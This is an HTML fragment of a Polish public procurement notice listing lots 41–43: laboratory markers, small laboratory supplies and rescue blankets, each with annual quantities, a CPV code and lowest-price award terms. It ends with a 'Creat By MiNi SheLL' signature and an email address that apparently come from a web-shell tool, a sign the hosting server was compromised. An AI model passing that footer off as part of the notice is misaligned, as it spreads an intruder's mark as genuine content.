<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Pisaki laboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  41 :  Pisaki  laboratoryjne

L.p	Nazwa asortymentu	J.m.	Potrzeby
roczne
(średnio )
1.	Pisaki  laboratoryjne ( czarne ) 
wodoodporne typu  Sanford  Sharpie
( cienkie  )  
(  grube  )	 
szt
szt
	
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Drobny sprzęt laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 42:  Drobny sprzęt laboratoryjny
 L.p	 Nazwa  asortymentu	 J.M.	Potrzeby  roczne (średnie)

1	Pojemniki  do transportu  moczu 100 ml  nie  sterylne 	szt	6000
2	Szkiełka podstawowe ze  szlifowanymi 
krawędziami ,   gładkie  gr.1 mm 	szt	3000
3	Szkiełka  podstawowe ze  szlifowanymi  krawędziami   z  obustronnym   matowym polem  do opisu  o  szer . 2 0 mm	szt	1500
4	Pipety  pasteurowskie  plastikowe poj.1 ml 
	szt	40000
5	Końcówki do pipet plastikowe  0,2 ml
	szt	30000
6	Końcówki do pipet plastikowe 1 ml
	szt	300
7	Kuwety makro plastikowe
	szt	1000
8	Kubeczki do analizatorów  plastikowe typu  
TECHNICON   2 ml	szt	2000
9	Naczynko 2 PS do  analizatora  HITACHI  poj. 3 ml  BSA 031	szt	30000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Koc ratunkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 43: Koce ratunkowe

 L.p	 Nazwa  asortymentu	 J.M.	Potrzeby  roczne (średnie)

1	Koc ratunkowy (folia życia) srebrno-złota o wymiarach 210x160 cm	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com